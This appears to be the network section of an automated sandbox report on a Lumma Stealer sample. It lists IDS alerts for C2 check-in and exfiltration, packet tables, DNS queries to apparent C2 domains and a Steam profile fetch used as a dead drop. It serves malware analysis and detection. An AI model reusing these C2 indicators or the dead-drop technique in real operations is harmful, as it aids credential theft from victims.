                                                                                                                                                                                                                                      2025-01-11T07:48:36.204096+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1049714104.21.80.1443TCP
                                                                                                                                                                                                                                      2025-01-11T07:48:36.204096+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1049714104.21.80.1443TCP
                                                                                                                                                                                                                                      2025-01-11T07:48:37.383901+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049725104.21.80.1443TCP
                                                                                                                                                                                                                                      2025-01-11T07:48:38.017404+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1049725104.21.80.1443TCP
                                                                                                                                                                                                                                      2025-01-11T07:48:38.663034+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049734104.21.80.1443TCP
                                                                                                                                                                                                                                      2025-01-11T07:48:40.133319+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049743104.21.80.1443TCP

                                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.557876110 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.557919025 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.557981968 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.560060024 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.560071945 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.213824034 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.213888884 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.218413115 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.218426943 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.218729019 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.267222881 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.559156895 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.599340916 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.974169016 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.974188089 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.974211931 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.974225998 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.974239111 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.974251986 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.974261999 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.974289894 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:33.974328041 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.069288015 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.069313049 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.069363117 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.069391012 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.069415092 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.069433928 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.074347019 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.074409962 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.074433088 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.074453115 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.074476957 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.074515104 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.075155020 CET49706443192.168.2.10104.102.49.254
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.075171947 CET44349706104.102.49.254192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.136643887 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.136687040 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.136763096 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.137554884 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.137572050 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.606312037 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.606385946 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.608057022 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.608068943 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.608326912 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.610022068 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.610044956 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.610105991 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.051529884 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.051628113 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.051691055 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.052386045 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.052386045 CET49708443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.052401066 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.052412987 CET44349708104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.228096008 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.228131056 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.232490063 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.232491016 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.232528925 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.696652889 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.696742058 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.697907925 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.697920084 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.698157072 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.699331045 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.699331045 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:35.699400902 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204118013 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204205990 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204236984 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204281092 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204294920 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204344988 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204375029 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204402924 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204451084 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204468012 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204741001 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204771996 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204817057 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204824924 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.204869032 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.208811998 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.251663923 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.251682043 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292499065 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292593956 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292632103 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292673111 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292701960 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292716026 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292731047 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.292771101 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.293931007 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.293947935 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.293956995 CET49714443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.293962002 CET44349714104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.920243025 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.920296907 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.920366049 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.920816898 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:36.920830011 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.383824110 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.383900881 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.385644913 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.385652065 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.385945082 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.387861013 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.388886929 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:37.388916016 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.017416000 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.017513037 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.017927885 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.018033028 CET49725443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.018047094 CET44349725104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.204125881 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.204138994 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.206338882 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.207207918 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.207216978 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.662805080 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.663033962 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.664165020 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.664171934 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.664441109 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.665529966 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.665657997 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.665685892 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.665747881 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:38.707335949 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:39.075666904 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:39.075751066 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:39.075920105 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:39.097028017 CET49734443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:39.097054005 CET44349734104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:39.676345110 CET49743443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:39.676358938 CET44349743104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:39.676467896 CET49743443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:39.676789999 CET49743443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:39.676800013 CET44349743104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.133203030 CET44349743104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.133318901 CET49743443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.134620905 CET49743443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.134633064 CET44349743104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.134902954 CET44349743104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.136074066 CET49743443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.136229038 CET49743443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.136254072 CET44349743104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.136322021 CET49743443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.136331081 CET44349743104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.624177933 CET44349743104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.624285936 CET44349743104.21.80.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.624378920 CET49743443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.624490023 CET49743443192.168.2.10104.21.80.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:40.624504089 CET44349743104.21.80.1192.168.2.10

                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.441646099 CET5118453192.168.2.101.1.1.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.450208902 CET53511841.1.1.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.453201056 CET5318153192.168.2.101.1.1.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.461771011 CET53531811.1.1.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.465985060 CET6121353192.168.2.101.1.1.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.475630999 CET53612131.1.1.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.480487108 CET5008153192.168.2.101.1.1.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.489180088 CET53500811.1.1.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.490806103 CET5875053192.168.2.101.1.1.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.499675035 CET53587501.1.1.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.501328945 CET6392853192.168.2.101.1.1.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.510358095 CET53639281.1.1.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.512094975 CET6282753192.168.2.101.1.1.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.520801067 CET53628271.1.1.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.522300959 CET5066153192.168.2.101.1.1.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.530841112 CET53506611.1.1.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.532793045 CET6120353192.168.2.101.1.1.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.541631937 CET53612031.1.1.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.543144941 CET4996353192.168.2.101.1.1.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.549899101 CET53499631.1.1.1192.168.2.10
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.091943026 CET5781853192.168.2.101.1.1.1
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.124991894 CET53578181.1.1.1192.168.2.10

                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.441646099 CET192.168.2.101.1.1.10x74c7Standard query (0)skidjazzyric.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.453201056 CET192.168.2.101.1.1.10x528Standard query (0)soundtappysk.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.465985060 CET192.168.2.101.1.1.10x9492Standard query (0)femalsabler.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.480487108 CET192.168.2.101.1.1.10x8304Standard query (0)apporholis.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.490806103 CET192.168.2.101.1.1.10x9ee8Standard query (0)crowdwarek.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.501328945 CET192.168.2.101.1.1.10xc69eStandard query (0)versersleep.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.512094975 CET192.168.2.101.1.1.10x8a49Standard query (0)chipdonkeruz.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.522300959 CET192.168.2.101.1.1.10x222aStandard query (0)handscreamny.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.532793045 CET192.168.2.101.1.1.10x1a23Standard query (0)robinsharez.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.543144941 CET192.168.2.101.1.1.10xcd2bStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.091943026 CET192.168.2.101.1.1.10x3c39Standard query (0)sputnik-1985.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.450208902 CET1.1.1.1192.168.2.100x74c7Name error (3)skidjazzyric.clicknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.461771011 CET1.1.1.1192.168.2.100x528Name error (3)soundtappysk.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.475630999 CET1.1.1.1192.168.2.100x9492Name error (3)femalsabler.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.489180088 CET1.1.1.1192.168.2.100x8304Name error (3)apporholis.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.499675035 CET1.1.1.1192.168.2.100x9ee8Name error (3)crowdwarek.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.510358095 CET1.1.1.1192.168.2.100xc69eName error (3)versersleep.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.520801067 CET1.1.1.1192.168.2.100x8a49Name error (3)chipdonkeruz.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.530841112 CET1.1.1.1192.168.2.100x222aName error (3)handscreamny.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.541631937 CET1.1.1.1192.168.2.100x1a23Name error (3)robinsharez.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:32.549899101 CET1.1.1.1192.168.2.100xcd2bNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.124991894 CET1.1.1.1192.168.2.100x3c39No error (0)sputnik-1985.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.124991894 CET1.1.1.1192.168.2.100x3c39No error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.124991894 CET1.1.1.1192.168.2.100x3c39No error (0)sputnik-1985.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.124991894 CET1.1.1.1192.168.2.100x3c39No error (0)sputnik-1985.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.124991894 CET1.1.1.1192.168.2.100x3c39No error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.124991894 CET1.1.1.1192.168.2.100x3c39No error (0)sputnik-1985.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                      Jan 11, 2025 07:48:34.124991894 CET1.1.1.1192.168.2.100x3c39No error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                      • sputnik-1985.com

                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      0192.168.2.1049706104.102.49.2544437464C:\Users\user\Desktop\xNuh0DUJaG.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-11 06:48:33 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                      2025-01-11 06:48:33 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Date: Sat, 11 Jan 2025 06:48:33 GMT
                                                                                                                                                                                                                                      Content-Length: 35126
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: sessionid=5abb7e8fb5f032eedda81f11; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
